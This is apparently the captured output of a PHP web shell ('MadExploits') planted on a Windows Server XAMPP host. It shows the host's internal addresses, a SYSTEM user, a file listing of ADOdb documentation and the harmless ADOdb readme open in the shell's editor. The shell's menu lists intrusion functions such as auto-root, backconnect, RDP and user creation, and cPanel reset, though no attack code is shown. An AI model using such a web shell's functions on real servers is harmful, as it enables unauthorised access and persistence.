Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
php /
pear /
adodb /
docs /
[ HOME SHELL ]
Name
Size
Permission
Action
docs-active-record.htm
48.16
KB
-rw-rw-rw-
docs-adodb.htm
381.11
KB
-rw-rw-rw-
docs-datadict.htm
23.63
KB
-rw-rw-rw-
docs-oracle.htm
26.72
KB
-rw-rw-rw-
docs-perf.htm
31.07
KB
-rw-rw-rw-
docs-session.htm
15.29
KB
-rw-rw-rw-
docs-session.old.htm
14.06
KB
-rw-rw-rw-
old-changelog.htm
51.84
KB
-rw-rw-rw-
readme.htm
3.2
KB
-rw-rw-rw-
tips_portable_sql.htm
20.08
KB
-rw-rw-rw-
tute.htm
15.75
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.htm
<html> <head> <title>ADODB Manual</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <XSTYLE body,td {font-family:Arial,Helvetica,sans-serif;font-size:11pt} pre {font-size:9pt} .toplink {font-size:8pt} /> </head> <body bgcolor="#FFFFFF"> <h3>ADOdb Library for PHP</h3> <p>ADOdb is a suite of database libraries that allow you to connect to multiple databases in a portable manner. Download from <a href=http://adodb.sourceforge.net/>http://adodb.sourceforge.net/</a>. <ul><li>The ADOdb documentation has moved to <a href=docs-adodb.htm>docs-adodb.htm</a> This allows you to query, update and insert records using a portable API. <p><li>The ADOdb data dictionary docs are at <a href=docs-datadict.htm>docs-datadict.htm</a>. This allows you to create database tables and indexes in a portable manner. <p><li>The ADOdb database performance monitoring docs are at <a href=docs-perf.htm>docs-perf.htm</a>. This allows you to perform health checks, tune and monitor your database. <p><li>The ADOdb database-backed session docs are at <a href=docs-session.htm>docs-session.htm</a>. </ul> <p> <h3>Installation</h3> Make sure you are running PHP5 or later. For PHP 4 or earlier, you need to use adodb 4.9. Unpack all the files into a directory accessible by your webserver. <p> To test, try modifying some of the tutorial examples. Make sure you customize the connection settings correctly. You can debug using: <pre> <?php include('adodb/adodb.inc.php'); $db = <b>ADONewConnection</b>($driver); # eg. 'mysql' or 'oci8' $db->debug = true; $db-><b>Connect</b>($server, $user, $password, $database); $rs = $db-><b>Execute</b>('select * from some_small_table'); print "<pre>"; print_r($rs-><b>GetRows</b>()); print "</pre>"; ?> </pre> <h3>How are people using ADOdb</h3> Here are some examples of how people are using ADOdb: <ul> <li> <strong>PhpLens</strong> is a commercial data grid component that allows both cool Web designers and serious unshaved programmers to develop and maintain databases on the Web easily. Developed by the author of ADOdb. </li> <li> <strong>PHAkt</strong>: PHP Extension for DreamWeaver Ultradev allows you to script PHP in the popular Web page editor. Database handling provided by ADOdb. </li> <li> <strong>Analysis Console for Intrusion Databases (ACID)</strong>: PHP-based analysis engine to search and process a database of security incidents generated by security-related software such as IDSes and firewalls (e.g. Snort, ipchains). By Roman Danyliw. </li> <li> <strong>PostNuke</strong> is a very popular free content management system and weblog system. It offers full CSS support, HTML 4.01 transitional compliance throughout, an advanced blocks system, and is fully multi-lingual enabled. </li> <li><strong> EasyPublish CMS</strong> is another free content management system for managing information and integrated modules on your internet, intranet- and extranet-sites. From Norway. </li> <li> <strong>NOLA</strong> is a full featured accounting, inventory, and job tracking application. It is licensed under the GPL, and developed by Noguska. </li> </ul> </body> </html>
Close